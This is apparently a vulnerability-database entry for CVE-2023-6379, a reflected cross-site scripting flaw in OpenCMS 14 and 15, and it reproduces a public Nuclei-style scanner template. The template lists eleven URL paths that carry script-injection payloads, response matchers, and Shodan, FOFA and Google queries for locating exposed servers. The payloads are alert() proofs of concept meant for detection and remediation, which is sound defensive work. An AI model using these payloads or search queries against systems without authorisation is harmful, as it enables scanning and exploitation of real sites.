CVE-2023-6379: OpenCMS 14 & 15 - Cross Site Scripting

Date: 2025-08-01 | Affected software: OpenCMS | PoC: public

Vulnerability description

Cross-site scripting (XSS) vulnerability in Alkacon Software Open CMS, affecting versions 14 and 15 of the 'Mercury' template.

PoC code [public]

id: CVE-2023-6379

info:
  name: OpenCMS 14 & 15 - Cross Site Scripting
  author: msegoviag
  severity: medium
  description: |
    Cross-site scripting (XSS) vulnerability in Alkacon Software Open CMS, affecting versions 14 and 15 of the 'Mercury' template.
  remediation: |
    Update to version OpenCMS 16
  reference:
    - https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2023-6379
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6379
    - https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-alkacon-software-opencms
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://github.com/msegoviag/msegoviag
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-6379
    cwe-id: CWE-79
    epss-score: 0.18616
    epss-percentile: 0.95033
    cpe: cpe:2.3:a:alkacon:opencms:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 11
    vendor: alkacon
    product: opencms
    shodan-query:
      - title:"opencms"
      - http.title:"opencms"
      - cpe:"cpe:2.3:a:alkacon:opencms"
      - /opencms/
    fofa-query: title="opencms"
    google-query: intitle:"opencms"
  tags: cve2023,cve,opencms,xss,alkacon,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}{{paths}}"
    payloads:
      paths:
        - '/tagebuch/eintraege/index.html?reloaded&page=1">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/list-editor/index.html?reloaded&page=3">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/advanced-elements/list/index.html?reloaded&sort=date_asc&page=3">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/advanced-elements/list/list-filters/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/lists/compact/index.html?reloaded&sort=date_desc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/lists/elaborate/index.html?reloaded&sort=date_desc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/lists/text-tiles/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/lists/masonry/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/blog/articles/index.html?reloaded&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/advanced-elements/form/index.html?formsubmit=12&formaction1=submit&InputField-11939054842=mrs&InputField-21939054842=190806&InputField-31939054842=403105&InputField-41939054842=2&InputField-51939054842=&InputField-61939054842=1&captcha_token_id=1"><script>alert(document.domain)<%2fscript>ufs5prh3qfe&captchaphrase1939054842=1'
        - '/content-elements/job-ad/index.html?reloaded&sort=date_desc&page=1">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"><script>alert(document.domain)</script>" />'
          - 'OpenCms'
        condition: and

      - type: word
        part: content_type
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 490a0046304402206d58eebb2cc6ffa6f9b9d2db428ee43e21e0b14a80a23982606e8dec9ac47699022021b82d804dfb3aaced498b6543b9c688421741822a86f859391c7437602515e7:922c64590222798bb761d5b6d8e72950
